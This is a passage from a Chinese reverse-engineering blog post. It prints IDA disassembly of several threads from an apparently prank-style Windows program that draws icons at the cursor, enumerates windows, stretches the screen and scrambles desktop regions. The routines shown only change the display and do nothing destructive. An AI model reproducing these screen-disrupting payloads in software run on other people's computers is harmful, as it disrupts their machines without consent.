.text:004019CB                 xor     eax, eax
.text:004019CD                 pop     esi
.text:004019CE                 retn    4
.text:004019CE sub_401994      endp

线程7:
跟着鼠标移动,绘制各种各样的图标

asm
.text:00401866                 push    ebp
.text:00401867                 mov     ebp, esp
.text:00401869                 sub     esp, 14h
.text:0040186C                 push    ebx
.text:0040186D                 push    esi
.text:0040186E                 mov     esi, ds:GetSystemMetrics
.text:00401874                 push    edi
.text:00401875                 push    0Bh             ; nIndex
.text:00401877                 call    esi ; GetSystemMetrics
.text:00401879                 cdq
.text:0040187A                 sub     eax, edx
.text:0040187C                 mov     edi, eax
.text:0040187E                 push    0Ch             ; nIndex
.text:00401880                 sar     edi, 1
.text:00401882                 call    esi ; GetSystemMetrics
.text:00401884                 cdq
.text:00401885                 sub     eax, edx
.text:00401887                 mov     esi, eax
.text:00401889                 sar     esi, 1
.text:0040188B                 call    ds:GetDesktopWindow
.text:00401891                 push    eax             ; hWnd
.text:00401892                 mov     [ebp+hWnd], eax
.text:00401895                 call    ds:GetWindowDC
.text:0040189B                 mov     ebx, eax
.text:0040189D                 lea     eax, [ebp+Point]
.text:004018A0                 push    eax             ; lpPoint
.text:004018A1                 call    ds:GetCursorPos
.text:004018A7                 push    7F01h           ; lpIconName
.text:004018AC                 push    0               ; hInstance
.text:004018AE                 call    ds:LoadIconW
.text:004018B4                 push    eax             ; hIcon
.text:004018B5                 mov     eax, [ebp+Point.y]
.text:004018B8                 sub     eax, esi
.text:004018BA                 push    eax             ; Y
.text:004018BB                 mov     eax, [ebp+Point.x]
.text:004018BE                 sub     eax, edi
.text:004018C0                 mov     edi, ds:DrawIcon
.text:004018C6                 push    eax             ; X
.text:004018C7                 push    ebx             ; hDC
.text:004018C8                 call    edi ; DrawIcon
.text:004018CA                 call    sub_401A55
.text:004018CF                 fild    [ebp+arg_0]
.text:004018D2                 mov     esi, eax
.text:004018D4                 fstp    [ebp+var_14]
.text:004018D7                 fld     [ebp+var_14]
.text:004018DA                 fdiv    ds:dbl_403A78
.text:004018E0                 fld1
.text:004018E2                 fadd    st(1), st
.text:004018E4                 fld     ds:dbl_403A50
.text:004018EA                 fdivrp  st(2), st
.text:004018EC                 faddp   st(1), st
.text:004018EE                 call    sub_401B09
.text:004018F3                 mov     ecx, eax
.text:004018F5                 mov     eax, esi
.text:004018F7                 cdq
.text:004018F8                 idiv    ecx
.text:004018FA                 test    edx, edx
.text:004018FC                 jnz     short loc_401928
.text:004018FE                 push    7F03h           ; lpIconName
.text:00401903                 push    edx             ; hInstance
.text:00401904                 call    ds:LoadIconW
.text:0040190A                 push    eax             ; hIcon
.text:0040190B                 call    sub_401A55
.text:00401910                 cdq
.text:00401911                 idiv    dword_405188
.text:00401917                 push    edx             ; Y
.text:00401918                 call    sub_401A55
.text:0040191D                 cdq
.text:0040191E                 idiv    dword_405184
.text:00401924                 push    edx             ; X
.text:00401925                 push    ebx             ; hDC
.text:00401926                 call    edi ; DrawIcon
.text:00401928
.text:00401928 loc_401928:                             ; CODE XREF: sub_401866+96↑j
.text:00401928                 push    ebx             ; hDC
.text:00401929                 push    [ebp+hWnd]      ; hWnd
.text:0040192C                 call    ds:ReleaseDC
.text:00401932                 push    2
.text:00401934                 pop     eax
.text:00401935                 pop     edi
.text:00401936                 pop     esi
.text:00401937                 pop     ebx
.text:00401938                 mov     esp, ebp
.text:0040193A                 pop     ebp
.text:0040193B                 retn
.text:0040193B sub_401866      endp

线程8:
枚举子窗口

asm
.text:00401688 sub_401688      proc near               ; DATA XREF: .data:00405168↓o
.text:00401688                 push    0               ; lParam
.text:0040168A                 push    offset EnumFunc ; lpEnumFunc
.text:0040168F                 call    ds:GetDesktopWindow
.text:00401695                 push    eax             ; hWndParent
.text:00401696                 call    ds:EnumChildWindows
.text:0040169C                 push    32h ; '2'
.text:0040169E                 pop     eax
.text:0040169F                 retn
.text:0040169F sub_401688      endp

线程9:
拉伸或压缩窗口

asm
.text:004017E9                 push    ebp
.text:004017EA                 mov     ebp, esp
.text:004017EC                 sub     esp, 18h
.text:004017EF                 push    esi
.text:004017F0                 push    edi
.text:004017F1                 call    ds:GetDesktopWindow
.text:004017F7                 mov     edi, eax
.text:004017F9                 push    edi             ; hWnd
.text:004017FA                 call    ds:GetWindowDC
.text:00401800                 mov     esi, eax
.text:00401802                 lea     eax, [ebp+Rect]
.text:00401805                 push    eax             ; lpRect
.text:00401806                 push    edi             ; hWnd
.text:00401807                 call    ds:GetWindowRect
.text:0040180D                 mov     eax, [ebp+Rect.bottom]
.text:00401810                 mov     ecx, [ebp+Rect.right]
.text:00401813                 push    0CC0020h        ; rop
.text:00401818                 push    eax             ; hSrc
.text:00401819                 push    ecx             ; wSrc
.text:0040181A                 push    0               ; ySrc
.text:0040181C                 push    0               ; xSrc
.text:0040181E                 push    esi             ; hdcSrc
.text:0040181F                 add     eax, 0FFFFFF9Ch
.text:00401822                 push    eax             ; hDest
.text:00401823                 lea     eax, [ecx-64h]
.text:00401826                 push    eax             ; wDest
.text:00401827                 push    32h ; '2'       ; yDest
.text:00401829                 push    32h ; '2'       ; xDest
.text:0040182B                 push    esi             ; hdcDest
.text:0040182C                 call    ds:StretchBlt
.text:00401832                 push    esi             ; hDC
.text:00401833                 push    edi             ; hWnd
.text:00401834                 call    ds:ReleaseDC
.text:0040183A                 fild    [ebp+arg_0]
.text:0040183D                 fstp    [ebp+var_8]
.text:00401840                 fld     [ebp+var_8]
.text:00401843                 fdiv    ds:dbl_403A48
.text:00401849                 fadd    ds:dbl_403A30
.text:0040184F                 fdivr   ds:dbl_403A70
.text:00401855                 fadd    ds:dbl_403A40
.text:0040185B                 call    sub_401B09
.text:00401860                 pop     edi
.text:00401861                 pop     esi
.text:00401862                 mov     esp, ebp
.text:00401864                 pop     ebp
.text:00401865                 retn
.text:00401865 sub_4017E9      endp

线程10:
修改桌面颜色

asm
.text:004016CD                 push    ebp
.text:004016CE                 mov     ebp, esp
.text:004016D0                 sub     esp, 24h
.text:004016D3                 push    ebx
.text:004016D4                 push    esi
.text:004016D5                 push    edi
.text:004016D6                 call    ds:GetDesktopWindow
.text:004016DC                 mov     ebx, eax
.text:004016DE                 push    ebx             ; hWnd
.text:004016DF                 mov     [ebp+hWnd], ebx
.text:004016E2                 call    ds:GetWindowDC
.text:004016E8                 mov     [ebp+hdc], eax
.text:004016EB                 lea     eax, [ebp+Rect]
.text:004016EE                 push    eax             ; lpRect
.text:004016EF                 push    ebx             ; hWnd
.text:004016F0                 call    ds:GetWindowRect
.text:004016F6                 call    sub_401A55
.text:004016FB                 mov     ecx, [ebp+Rect.right]
.text:004016FE                 add     ecx, 0FFFFFF9Ch
.text:00401701                 cdq
.text:00401702                 idiv    ecx
.text:00401704                 mov     [ebp+x], edx
.text:00401707                 call    sub_401A55
.text:0040170C                 mov     ecx, [ebp+Rect.bottom]
.text:0040170F                 add     ecx, 0FFFFFF9Ch
.text:00401712                 cdq
.text:00401713                 idiv    ecx
.text:00401715                 mov     [ebp+y], edx
.text:00401718                 call    sub_401A55
.text:0040171D                 mov     ecx, [ebp+Rect.right]
.text:00401720                 add     ecx, 0FFFFFF9Ch
.text:00401723                 cdq
.text:00401724                 idiv    ecx
.text:00401726                 mov     ebx, edx
.text:00401728                 call    sub_401A55
.text:0040172D                 mov     ecx, [ebp+Rect.bottom]
.text:00401730                 add     ecx, 0FFFFFF9Ch
.text:00401733                 cdq
.text:00401734                 idiv    ecx
.text:00401736                 mov     edi, edx
.text:00401738                 call    sub_401A55
.text:0040173D                 cdq
.text:0040173E                 mov     ecx, 258h
.text:00401743                 idiv    ecx
.text:00401745                 mov     esi, edx
.text:00401747                 call    sub_401A55
.text:0040174C                 cdq
.text:0040174D                 mov     ecx, 258h
.text:00401752                 idiv    ecx
.text:00401754                 push    0CC0020h        ; rop
.text:00401759                 push    edi             ; y1
.text:0040175A                 push    ebx             ; x1
.text:0040175B                 mov     ebx, [ebp+hdc]
.text:0040175E                 push    ebx             ; hdcSrc
.text:0040175F                 push    edx             ; cy
.text:00401760                 push    esi             ; cx
.text:00401761                 push    [ebp+y]         ; y
.text:00401764                 push    [ebp+x]         ; x
.text:00401767                 push    ebx             ; hdc
.text:00401768                 call    ds:BitBlt
.text:0040176E                 push    ebx             ; hDC
.text:0040176F                 push    [ebp+hWnd]      ; hWnd
.text:00401772                 call    ds:ReleaseDC
.text:00401778                 fild    [ebp+arg_0]
.text:0040177B                 fstp    qword ptr [ebp-14h]
.text:0040177E                 fld     qword ptr [ebp-14h]
.text:00401781                 fdiv    ds:dbl_403A48
.text:00401787                 fadd    ds:dbl_403A30
.text:0040178D                 fdivr   ds:dbl_403A70
.text:00401793                 fadd    ds:dbl_403A38
.text:00401799                 call    sub_401B09
.text:0040179E                 pop     edi
.text:0040179F                 pop     esi
.text:004017A0                 pop     ebx
.text:004017A1                 mov     esp, ebp
.text:004017A3                 pop     ebp
.text:004017A4                 retn
.text:004017A4 sub_4016CD      endp

本文作者:Na1r

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!